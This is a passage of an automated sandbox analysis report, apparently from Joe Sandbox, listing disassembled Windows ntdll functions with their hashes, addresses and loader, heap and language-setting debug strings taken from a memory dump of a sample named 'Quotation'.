                                                              control_flow_graph 7 33e92dd0-33e92ddc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0ed4c9144cb2c0a584dff297bf9ddead4ea0515c7e38415b9e01572543fd53c2
                                                              • Instruction ID: 8c0a35d3953b3819cdfc142ef9695e0a6f91d4c54d614dc8fe7686e0e18e1a9f
                                                              • Opcode Fuzzy Hash: 0ed4c9144cb2c0a584dff297bf9ddead4ea0515c7e38415b9e01572543fd53c2
                                                              • Instruction Fuzzy Hash: E6900271B42445525585B19C4405507480667E0242795C013A1414D10C8526995AD621
                                                              Function 33E92D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6 33e92d30-33e92d3c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 448e32bd51f5d704d1f2999dddabb64348e92a4c0dd14120bbf9f9b592a00e06
                                                              • Instruction ID: fc08055c5488b5abdd5fafd8f5010e81c2ff063f735e57392b21d8196f3d856a
                                                              • Opcode Fuzzy Hash: 448e32bd51f5d704d1f2999dddabb64348e92a4c0dd14120bbf9f9b592a00e06
                                                              • Instruction Fuzzy Hash: 3C900271B0140403D180719C54196064805A7E1302F55D012E0414914CD915895A5222
                                                              Function 33E92D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5 33e92d10-33e92d1c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f8b65e41cd2ad3f3c463eb6f91615d585ee34f8a3e853b10db826a1d6a2b9139
                                                              • Instruction ID: a7c3e3543895ae83878d7178ed6e8d54cbb8ff734474c53bd909507b943143e3
                                                              • Opcode Fuzzy Hash: f8b65e41cd2ad3f3c463eb6f91615d585ee34f8a3e853b10db826a1d6a2b9139
                                                              • Instruction Fuzzy Hash: 9F900279B1340402D1C0719C540960A080557D1203F95D416A0015918CC915896D5321
                                                              Function 33E92CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4 33e92ca0-33e92cac LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1da9a710c02272cbb0333dc8a05f75a886de8b3cf2c26875819a69bb281f1935
                                                              • Instruction ID: d5fbe6075acdcad79b8eec3d54f7b599867534e15b368f1e52b31ab42ec41ffe
                                                              • Opcode Fuzzy Hash: 1da9a710c02272cbb0333dc8a05f75a886de8b3cf2c26875819a69bb281f1935
                                                              • Instruction Fuzzy Hash: C2900271B0140802D14075DC5409646080557E0302F55D012A5024915EC66589956131
                                                              Function 33E92C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3 33e92c70-33e92c7c LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c095cd8a35795d8cbef6a7b3d352dc88ddd6015e6bd3aa9374b2fa1fa9f204f4
                                                              • Instruction ID: 42fa99cc2b9860fa4448d67bdceaa1ea31e19482d4ef9fb1bff4edbaa262d1e2
                                                              • Opcode Fuzzy Hash: c095cd8a35795d8cbef6a7b3d352dc88ddd6015e6bd3aa9374b2fa1fa9f204f4
                                                              • Instruction Fuzzy Hash: 9B900271B0148C02D150719C840574A080557D0302F59C412A4424A18D869589957121

                                                              Non-executed Functions

                                                              Function 33ED2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: d95b1fc4b40d9fad2ebb73ddae4569f2f9c18bb1a47f5dcf89719f1b97449eee
                                                              • Instruction ID: cf55dee51cd4f57d77c00096a6ad48ffdecf58e24b3d5c7b73f5436147718431
                                                              • Opcode Fuzzy Hash: d95b1fc4b40d9fad2ebb73ddae4569f2f9c18bb1a47f5dcf89719f1b97449eee
                                                              • Instruction Fuzzy Hash: B1926CB5A18341AFE721CF24C880B5BB7E8BF88758F44492DFA94DB650D770D846CB92
                                                              Function 33F00274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 3446177414-1700792311
                                                              • Opcode ID: 61ea17a511b5887e2f372513d643467da5a0b0cbd6b2efd9369b9a0649ff776a
                                                              • Instruction ID: e861c6f5a5611b4fdebf3fe06588e1afbb43aa46de7df96b2c70673a94a6b85e
                                                              • Opcode Fuzzy Hash: 61ea17a511b5887e2f372513d643467da5a0b0cbd6b2efd9369b9a0649ff776a
                                                              • Instruction Fuzzy Hash: DCD1E079910786EFDB02DFA8C410AADBBF2FF49300F888459E495AB652C738D981DF54
                                                              Function 33E4D34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/3$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3186455409
                                                              • Opcode ID: 7ddd64dcfa8bb444b144cf5c1b21ac2a3fdc4141d37805ff0dd1e739477187be
                                                              • Instruction ID: 5eab0e5b3b8fd19232fb5c5c942a762934880cc77ac68c3e4beb4038032fb594
                                                              • Opcode Fuzzy Hash: 7ddd64dcfa8bb444b144cf5c1b21ac2a3fdc4141d37805ff0dd1e739477187be
                                                              • Instruction Fuzzy Hash: 79B1BFB29083459FD711CF68E440A5FBBE8BF88758F46096EF888D7241DB34D948CB92
                                                              Function 33F012ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              • Opcode ID: c644b9229bd4e7fcf558768835a5f766bea7bee675c8ce432421a93c97d3f614
                                                              • Instruction ID: 16760793a6fb40f1f2d5e853d48b14747b449d92947a866036691e48f168f704
                                                              • Opcode Fuzzy Hash: c644b9229bd4e7fcf558768835a5f766bea7bee675c8ce432421a93c97d3f614
                                                              • Instruction Fuzzy Hash: BB12AD79610742EFD715AF68C480BBABBF5EF09314F988859E4D58B682D734E880EF50
                                                              Function 33E4D08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 33E4D313
                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 33E4D196
                                                              • H/3, xrefs: 33EAA843
                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 33E4D262
                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 33E4D0CF
                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 33E4D146
                                                              • @, xrefs: 33E4D2AF
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 33E4D2C3
                                                              • @, xrefs: 33E4D0FD
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/3$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                              • API String ID: 0-3546177236
                                                              • Opcode ID: 94e9ce6f4155ba1cc669668ff5ce2e70483f87823d6ac03da61df344984e6499
                                                              • Instruction ID: 9b755d2e72da1ff49e23f6c1ba38421b579643b59a1c4cac47be1e445e086985
                                                              • Opcode Fuzzy Hash: 94e9ce6f4155ba1cc669668ff5ce2e70483f87823d6ac03da61df344984e6499
                                                              • Instruction Fuzzy Hash: A1A18BB19083459FE311CF64D480B9BB7E8BB88759F41492EF9989A241E774D908CF93
                                                              Function 33E61070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 33EB5672
                                                                • Part of subcall function 33E92BF0: LdrInitializeThunk.NTDLL ref: 33E92BFA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugInitializePrintThunkTimes
                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3681346633-3570731704
                                                              • Opcode ID: b79e8c917a7379557fc7be22663379659e76eb18847eac2659610545050d5997
                                                              • Instruction ID: 650cd161fee3fe13822f9f266c135b3969d2791ffbb462b28230c8563a9a67df
                                                              • Opcode Fuzzy Hash: b79e8c917a7379557fc7be22663379659e76eb18847eac2659610545050d5997
                                                              • Instruction Fuzzy Hash: D6924779E44368CFEB21CF28CC40B99B7B5AF44358F0581EAD999A7290D7349E80CF51
                                                              Function 33E7D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 33E7D959
                                                                • Part of subcall function 33E54859: RtlDebugPrintTimes.NTDLL ref: 33E548F7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1975516107
                                                              • Opcode ID: 7859f8c82c6abd6a680e4b768fdf8de4b84d30288c44fa23a754ca6a9dc1794b
                                                              • Instruction ID: 9a09aaca7276a0d577bf09db1868285e05f9f29b057147e94fdd8aed61565f98
                                                              • Opcode Fuzzy Hash: 7859f8c82c6abd6a680e4b768fdf8de4b84d30288c44fa23a754ca6a9dc1794b
                                                              • Instruction Fuzzy Hash: 5451A9B5E04345DFEB00EFE4C5947DEBBB1BF48318FA84159D454AB691DB70A982CB80
                                                              Function 33EE9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                              • API String ID: 2994545307-3063724069
                                                              • Opcode ID: ec0b0f1483efdfb7c968ac5e27e4d736c8db96d203d72cf451401dafb6d245d7
                                                              • Instruction ID: f27aedadc016d4bd70abee2e2f9f2723127375b07f1fd3fadee001bba9864d67
                                                              • Opcode Fuzzy Hash: ec0b0f1483efdfb7c968ac5e27e4d736c8db96d203d72cf451401dafb6d245d7
                                                              • Instruction Fuzzy Hash: 11D1C5B2815316AFE721CB54C840B6FB7F8BF84754F45092AF9D4AB250E778C948CB92
                                                              Function 33E4F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              • Opcode ID: b8d36ac62033679cac9ea59454233fabe54fe391be2ca2e2a091f9356c940cd0
                                                              • Instruction ID: a17b3568073d981b09a1962f005925068fd1ae2677a7953d75e681a891e8e2b8
                                                              • Opcode Fuzzy Hash: b8d36ac62033679cac9ea59454233fabe54fe391be2ca2e2a091f9356c940cd0
                                                              • Instruction Fuzzy Hash: 7742EF75A18381DFD301CF28E890A2ABBF5FF88748F484A6DE4958B751DB34E846CB51
                                                              Function 33E751EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H/3$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-1394976480
                                                              • Opcode ID: b0185d41f73a79d5c02683012a610d9f6f085407912919b5d4c02dede5b7a178
                                                              • Instruction ID: 6b25fce4d70164aa1bf674f79c1e2cd114554a600cdb3147c7804f1ee977f200
                                                              • Opcode Fuzzy Hash: b0185d41f73a79d5c02683012a610d9f6f085407912919b5d4c02dede5b7a178
                                                              • Instruction Fuzzy Hash: A0F13AB6D10619EFDB02CFA4C980ADEBBB9FF48654F55006AE411E7650EB749E018BA0
                                                              Function 33E6B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              • Opcode ID: 90061a9d9fadff4ff4b89b239faf4f0be02d3ef8d6a8394d6506dfec2f7de61b
                                                              • Instruction ID: 9ff20e03a6ee9d1be6f8ffa87f712af3981d9d77106e0d4ddb50601f08aeb03a
                                                              • Opcode Fuzzy Hash: 90061a9d9fadff4ff4b89b239faf4f0be02d3ef8d6a8394d6506dfec2f7de61b
                                                              • Instruction Fuzzy Hash: A2C16771F84356AFEB158B65C890BBE77B5AF8030CF484069E845EB791EBB4D944C390
                                                              Function 33E863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: e6e0b168e08170319ac5901eb777f6483c538f652e7c783c2037daaef63ee5d8
                                                              • Instruction ID: ecd49ff11ba5fde4e000cd5b80e107f29d300132f75b7f6a2972dc10f866a88c
                                                              • Opcode Fuzzy Hash: e6e0b168e08170319ac5901eb777f6483c538f652e7c783c2037daaef63ee5d8
                                                              • Instruction Fuzzy Hash: 58912471E013589FEB16DF50CA50B9E7BB4BF41B68F840129E959BF681DB748842CBD0
                                                              Function 33E8C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 33EC8181, 33EC81F5
                                                              • LdrpInitializeProcess, xrefs: 33E8C6C4
                                                              • LdrpInitializeImportRedirection, xrefs: 33EC8177, 33EC81EB
                                                              • Loading import redirection DLL: '%wZ', xrefs: 33EC8170
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 33EC81E5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33E8C6C3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: 2afe6b5696678ff4ec22fae9377a10ff7916c7061e0d1a19558459fb4533295c
                                                              • Instruction ID: 6d77ccae29924054b92310588bcfefe6e353597dcdf84af1487f1dd5bed606c0
                                                              • Opcode Fuzzy Hash: 2afe6b5696678ff4ec22fae9377a10ff7916c7061e0d1a19558459fb4533295c
                                                              • Instruction Fuzzy Hash: 1E311871A153559FD310EF28DE45E1EB7E4EF85B24F480568F894AB291E720DC05CBA2
                                                              Function 33E82674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33EC219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33EC21BF
                                                              • RtlGetAssemblyStorageRoot, xrefs: 33EC2160, 33EC219A, 33EC21BA
                                                              • SXS: %s() passed the empty activation context, xrefs: 33EC2165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33EC2178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33EC2180
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
